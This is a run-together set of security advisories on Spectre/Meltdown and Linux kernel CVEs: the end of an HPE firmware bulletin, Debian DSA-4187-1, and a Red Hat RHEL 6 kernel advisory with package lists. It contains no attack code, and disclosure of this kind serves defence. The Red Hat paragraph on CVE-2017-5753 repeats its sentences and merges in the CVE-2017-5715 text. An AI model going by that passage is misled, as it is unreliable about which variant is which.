ProLiant ML110 Gen9 Server To be delivered\n  - HP ProLiant ML150 Gen9 Server To be delivered\n  - HPE ProLiant ML350 Gen9 Server To be delivered\n  - HP ProLiant DL380 Gen9 Server To be delivered\n  - HP ProLiant DL120 Gen9 Server To be delivered\n  - HPE ProLiant DL560 Gen9 Server To be delivered\n  - HP ProLiant BL660c Gen9 Server To be delivered\n  - HPE ProLiant DL20 Gen9 Server To be delivered\n  - HPE Synergy 660 Gen9 Compute Module To be delivered\n  - HPE Synergy 480 Gen9 Compute Module To be delivered\n  - HPE ProLiant ML30 Gen9 Server To be delivered\n  - HPE ProLiant XL250a Gen9 Server To be delivered\n  - HPE ProLiant XL190r Gen9 Server To be delivered\n  - HP ProLiant DL80 Gen9 Server To be delivered\n  - HPE ProLiant DL180 Gen9 Server To be delivered\n  - HPE ProLiant XL270d Gen9 Accelerator Tray 2U Configure-to-order Server To\nbe delivered\n  - HPE ProLiant WS460c Gen9 Workstation To be delivered\n  - HPE ProLiant XL260a Gen9 Server To be delivered\n  - HPE Synergy 620 Gen9 Compute Module To be delivered\n  - HPE ProLiant DL580 Gen9 Server To be delivered\n  - HPE Synergy 680 Gen9 Compute Module To be delivered\n  - HPE ProLiant m510 Server Cartridge prior to v1.62\n  - HPE ProLiant m710p Server Cartridge prior to v12/12/2017\n  - HPE ProLiant m710x Server Cartridge prior to v1.60\n  - HP ProLiant m710 Server Cartridge prior to 12/12/2017 (v1.60)\n  - HPE Synergy Composer prior to 12/12/2017\n  - HPE Integrity Superdome X with BL920s Blades prior to 8.8.6\n  - HP ProLiant DL360 Gen9 Server prior to 2.3.110\n  - HPE ProLiant Thin Micro TM200 Server prior to 1/16/2017\n  - HPE ProLiant ML10 v2 Server prior to 12/12/2017\n  - HPE ProLiant m350 Server Cartridge prior to v1/15/2018\n  - HPE ProLiant m300 Server Cartridge prior to v1/15/2018\n  - HPE ProLiant MicroServer Gen8 prior to 12/12/2017\n  - HPE ProLiant ML310e Gen8 v2 Server prior to v12/12/2017\n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2017-5715\n      8.2 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N\n      6.8 (AV:A/AC:L/Au:N/C:C/I:P/A:N)\n\n    CVE-2017-5753\n      5.0 CVSS:3.0/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L\n      5.4 (AV:A/AC:M/Au:N/C:P/I:P/A:P)\n\n    CVE-2017-5754\n      7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n      7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following system ROM updates which include an updated\nmicrocode to resolve the vulnerability:\n\n  * HPE has provided a customer bulletin\n\u003chttps://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00039267en_us\u003e\nwith specific instructions to obtain the udpated sytem ROM\n  \n  - Note:\n   \n    + CVE-2017-5715 (Variant 2) requires that the System ROM be updated and a\nvendor supplied operating system update be applied as well. \n    + For CVE-2017-5753, CVE-2017-5754 (Variants 1 and 3) require only\nupdates of a vendor supplied operating system. \n    + HPE will continue to add additional products to the list. \n\nHISTORY\n\nVersion:1 (rev.1) - 4 January 2018 Initial release\n\nVersion:2 (rev.2) - 5 January 2018 Added additional impacted products\n\nVersion:3 (rev.3) - 10 January 2018 Added  more impacted products\n\nVersion:4 (rev.4) - 9 January 2018 Fixed product ID\n\nVersion:5 (rev.5) - 18 January 2018 Added additional impacted products\n\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4187-1                   security@debian.org\nhttps://www.debian.org/security/                            Ben Hutchings\nMay 01, 2018                          https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : linux\nCVE ID         : CVE-2015-9016 CVE-2017-0861 CVE-2017-5715 CVE-2017-5753\n                 CVE-2017-13166 CVE-2017-13220 CVE-2017-16526 CVE-2017-16911\n                 CVE-2017-16912 CVE-2017-16913 CVE-2017-16914 CVE-2017-18017\n                 CVE-2017-18203 CVE-2017-18216 CVE-2017-18232 CVE-2017-18241\n                 CVE-2018-1066 CVE-2018-1068 CVE-2018-1092 CVE-2018-5332\n                 CVE-2018-5333 CVE-2018-5750 CVE-2018-5803 CVE-2018-6927\n                 CVE-2018-7492 CVE-2018-7566 CVE-2018-7740 CVE-2018-7757\n                 CVE-2018-7995 CVE-2018-8781 CVE-2018-8822 CVE-2018-1000004\n                 CVE-2018-1000199\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks. \n\nCVE-2015-9016\n\n    Ming Lei reported a race condition in the multiqueue block layer\n    (blk-mq).  On a system with a driver using blk-mq (mtip32xx,\n    null_blk, or virtio_blk), a local user might be able to use this\n    for denial of service or possibly for privilege escalation. \n\nCVE-2017-0861\n\n    Robb Glasser reported a potential use-after-free in the ALSA (sound)\n    PCM core.  We believe this was not possible in practice. \n\nCVE-2017-5715\n\n    Multiple researchers have discovered a vulnerability in various\n    processors supporting speculative execution, enabling an attacker\n    controlling an unprivileged process to read memory from arbitrary\n    addresses, including from the kernel and all other processes\n    running on the system. \n\n    This specific attack has been named Spectre variant 2 (branch\n    target injection) and is mitigated for the x86 architecture (amd64\n    and i386) by using the \"retpoline\" compiler feature which allows\n    indirect branches to be isolated from speculative execution. \n\nCVE-2017-5753\n\n    Multiple researchers have discovered a vulnerability in various\n    processors supporting speculative execution, enabling an attacker\n    controlling an unprivileged process to read memory from arbitrary\n    addresses, including from the kernel and all other processes\n    running on the system. \n\n    This specific attack has been named Spectre variant 1\n    (bounds-check bypass) and is mitigated by identifying vulnerable\n    code sections (array bounds checking followed by array access) and\n    replacing the array access with the speculation-safe\n    array_index_nospec() function. \n\n    More use sites will be added over time. \n\nCVE-2017-13166\n\n    A bug in the 32-bit compatibility layer of the v4l2 ioctl handling\n    code has been found. Memory protections ensuring user-provided\n    buffers always point to userland memory were disabled, allowing\n    destination addresses to be in kernel space. On a 64-bit kernel a\n    local user with access to a suitable video device can exploit this\n    to overwrite kernel memory, leading to privilege escalation. \n\nCVE-2017-13220\n\n    Al Viro reported that the Bluetooth HIDP implementation could\n    dereference a pointer before performing the necessary type check. \n    A local user could use this to cause a denial of service. \n\nCVE-2017-16526\n\n    Andrey Konovalov reported that the UWB subsystem may dereference\n    an invalid pointer in an error case.  A local user might be able\n    to use this for denial of service. \n\nCVE-2017-16911\n\n    Secunia Research reported that the USB/IP vhci_hcd driver exposed\n    kernel heap addresses to local users. \n\nCVE-2017-16912\n\n    Secunia Research reported that the USB/IP stub driver failed to\n    perform a range check on a received packet header field, leading\n    to an out-of-bounds read.  A remote user able to connect to the\n    USB/IP server could use this for denial of service. \n\nCVE-2017-16913\n\n    Secunia Research reported that the USB/IP stub driver failed to\n    perform a range check on a received packet header field, leading\n    to excessive memory allocation.  A remote user able to connect to\n    the USB/IP server could use this for denial of service. \n\nCVE-2017-16914\n\n    Secunia Research reported that the USB/IP stub driver failed to\n    check for an invalid combination of fields in a received packet,\n    leading to a null pointer dereference.  A remote user able to\n    connect to the USB/IP server could use this for denial of service. \n\nCVE-2017-18017\n\n    Denys Fedoryshchenko reported that the netfilter xt_TCPMSS module\n    failed to validate TCP header lengths, potentially leading to a\n    use-after-free.  If this module is loaded, it could be used by a\n    remote attacker for denial of service or possibly for code\n    execution. \n\nCVE-2017-18203\n\n    Hou Tao reported that there was a race condition in creation and\n    deletion of device-mapper (DM) devices.  A local user could\n    potentially use this for denial of service. \n\nCVE-2017-18216\n\n    Alex Chen reported that the OCFS2 filesystem failed to hold a\n    necessary lock during nodemanager sysfs file operations,\n    potentially leading to a null pointer dereference.  A local user\n    could use this for denial of service. \n\nCVE-2017-18232\n\n    Jason Yan reported a race condition in the SAS (Serial-Attached\n    SCSI) subsystem, between probing and destroying a port.  This\n    could lead to a deadlock.  A physically present attacker could\n    use this to cause a denial of service. \n\nCVE-2017-18241\n\n    Yunlei He reported that the f2fs implementation does not properly\n    initialise its state if the \"noflush_merge\" mount option is used. \n    A local user with access to a filesystem mounted with this option\n    could use this to cause a denial of service. \n\nCVE-2018-1066\n\n    Dan Aloni reported to Red Hat that the CIFS client implementation\n    would dereference a null pointer if the server sent an invalid\n    response during NTLMSSP setup negotiation.  This could be used\n    by a malicious server for denial of service. \n\nCVE-2018-1068\n\n    The syzkaller tool found that the 32-bit compatibility layer of\n    ebtables did not sufficiently validate offset values. On a 64-bit\n    kernel, a local user with the CAP_NET_ADMIN capability (in any user\n    namespace) could use this to overwrite kernel memory, possibly\n    leading to privilege escalation. Debian disables unprivileged user\n    namespaces by default. \n\nCVE-2018-1092\n\n    Wen Xu reported that a crafted ext4 filesystem image would\n    trigger a null dereference when mounted.  A local user able\n    to mount arbitrary filesystems could use this for denial of\n    service. \n\nCVE-2018-5332\n\n    Mohamed Ghannam reported that the RDS protocol did not\n    sufficiently validate RDMA requests, leading to an out-of-bounds\n    write.  A local attacker on a system with the rds module loaded\n    could use this for denial of service or possibly for privilege\n    escalation. \n\nCVE-2018-5333\n\n    Mohamed Ghannam reported that the RDS protocol did not properly\n    handle an error case, leading to a null pointer dereference.  A\n    local attacker on a system with the rds module loaded could\n    possibly use this for denial of service. \n\nCVE-2018-5750\n\n    Wang Qize reported that the ACPI sbshc driver logged a kernel heap\n    address. \n\nCVE-2018-5803\n\n    Alexey Kodanev reported that the SCTP protocol did not range-check\n    the length of chunks to be created.  A local or remote user could\n    use this to cause a denial of service. \n\nCVE-2018-6927\n\n    Li Jinyue reported that the FUTEX_REQUEUE operation on futexes did\n    not check for negative parameter values, which might lead to a\n    denial of service or other security impact. \n\nCVE-2018-7492\n\n    The syzkaller tool found that the RDS protocol was lacking a null\n    pointer check.  A local attacker on a system with the rds module\n    loaded could use this for denial of service. \n\nCVE-2018-7566\n\n    Fan LongFei reported a race condition in the ALSA (sound)\n    sequencer core, between write and ioctl operations.  This could\n    lead to an out-of-bounds access or use-after-free.  A local user\n    with access to a sequencer device could use this for denial of\n    service or possibly for privilege escalation. \n\nCVE-2018-7740\n\n    Nic Losby reported that the hugetlbfs filesystem\u0027s mmap operation\n    did not properly range-check the file offset.  A local user with\n    access to files on a hugetlbfs filesystem could use this to cause\n    a denial of service. \n\nCVE-2018-7757\n\n    Jason Yan reported a memory leak in the SAS (Serial-Attached\n    SCSI) subsystem.  A local user on a system with SAS devices\n    could use this to cause a denial of service. \n\nCVE-2018-7995\n\n    Seunghun Han reported a race condition in the x86 MCE\n    (Machine Check Exception) driver.  This is unlikely to have\n    any security impact. \n\nCVE-2018-8781\n\n    Eyal Itkin reported that the udl (DisplayLink) driver\u0027s mmap\n    operation did not properly range-check the file offset.  A local\n    user with access to a udl framebuffer device could exploit this to\n    overwrite kernel memory, leading to privilege escalation. \n\nCVE-2018-8822\n\n    Dr Silvio Cesare of InfoSect reported that the ncpfs client\n    implementation did not validate reply lengths from the server.  An\n    ncpfs server could use this to cause a denial of service or\n    remote code execution in the client. \n\nCVE-2018-1000004\n\n    Luo Quan reported a race condition in the ALSA (sound) sequencer\n    core, between multiple ioctl operations.  This could lead to a\n    deadlock or use-after-free.  A local user with access to a\n    sequencer device could use this for denial of service or possibly\n    for privilege escalation. \n\nCVE-2018-1000199\n\n    Andy Lutomirski discovered that the ptrace subsystem did not\n    sufficiently validate hardware breakpoint settings.  Local users\n    can use this to cause a denial of service, or possibly for\n    privilege escalation, on x86 (amd64 and i386) and possibly other\n    architectures. \n\nFor the oldstable distribution (jessie), these problems have been fixed\nin version 3.16.56-1. \n\nWe recommend that you upgrade your linux packages. \n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlron61fFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Rtqw//Xf/L4bP65wU9M59Ef6xBt+Eph+yxeMsioGhu80ODdMemlmHzASMtfZjY\nAXxyt9l8lbHn8MmwDA4aLhhwHYXwvKATdpHSy1SILrRfb4s9P9uV1vsHaIeZ649E\nhDyNon9hP2tPso6BwqiYHZZy9Xxtd+T8vTBeBZwUKOLBkBRvV/gyNSUdJWp6L8WH\naF4D1hHl9ZotDkyIvkubbx77aqbJ88I4R0n69x7L9udFbuXa+U7hV6dJdnpzyl/7\nOukJfEtnkaUgWu0MdOfFss6iH5OQISn/y/ricRi29oKQiEp3YwnT5J9pFwSQeJJS\nH8ABVt251UoS0J+of3QWw0muOT/6UAF8SNpPKMJXC7Euq8pTmYVPSIeUYf4eqn65\nUHZSCKXaszItq+uzVNYdkj504BJ4cG1lFxZtlrFWwKE8p7QOETN0GKvTRdu/SvDd\nHl2nb4HouLpBYS518Th2/MGgzhXXAuO12MH3smenptZbqxKn9Z0XSTJYzFupgJk/\nkKF2xkDFBE4toTLVE+6XdUKwYk4vkeDZyOGOwRYThSkKAzrUh5zThgal4HnknD2A\n5ye4XLhjgSIT47/nmor6lhxd7WGXGkV33GF0azYlHr/sclfzxcU2Ev3NUBWQ8M3s\nCxfIO0FNCzO0WIUf40md7MlIAnDBIRGyYgNIIe7AnSRKKPykEx8=\n=wNQS\n-----END PGP SIGNATURE-----\n. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. \n\nSecurity Fix(es):\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a commonly\nused performance optimization). There are three primary variants of the\nissue which differ in the way the speculative execution can be exploited. \n\nNote: This issue is present in hardware and cannot be fully fixed via\nsoftware update. The updated kernel packages provide software mitigation\nfor this hardware issue at a cost of potential performance penalty. Please\nrefer to References section for further information about this issue and\nthe performance impact. \n\nIn this update mitigations for x86-64 architecture are provided. \n\nVariant CVE-2017-5753 triggers the speculative execution by performing a\nbounds-check bypass. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nboundary and read privileged memory by conducting targeted cache\nside-channel attacks. It relies on the presence of a precisely-defined\ninstruction sequence in the privileged code as well as the fact that memory\naccesses may cause allocation into the microprocessor\u0027s data cache even for\nspeculatively executed instructions that never actually commit (retire). As\na result, an unprivileged attacker could use this flaw to cross the syscall\nand guest/host boundaries and read privileged memory by conducting targeted\ncache side-channel attacks. (CVE-2017-5715, Important)\n\nVariant CVE-2017-5754 relies on the fact that, on impacted microprocessors,\nduring speculative execution of instruction permission faults, exception\ngeneration triggered by a faulting access is suppressed until the\nretirement of the whole instruction block. In a combination with the fact\nthat memory accesses may populate the cache even when the block is being\ndropped and never committed (executed), an unprivileged local attacker\ncould use this flaw to read privileged (kernel space) memory by conducting\ntargeted cache side-channel attacks. (CVE-2017-5754, Important)\n\nNote: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64\nmicroprocessors are not affected by this issue. \n\nRed Hat would like to thank Google Project Zero for reporting these issues. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1519778 - CVE-2017-5753 hw: cpu: speculative execution bounds-check bypass\n1519780 - CVE-2017-5715 hw: cpu: speculative execution branch target injection\n1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-devel-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-headers-2.6.32-696.18.7.el6.ppc64.rpm\nperf-2.6.32-696.18.7.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm\nkernel-devel-2.6.32-696.18.7.el6.s390x.rpm\nkernel-headers-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-696.18.7.el6.s390x.rpm\nperf-2.6.32-696.18.7.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-696.18.7.el6.ppc64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-2.6.32-696.18.7.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-696.18.7.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-2.6.32-696.18.7.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise 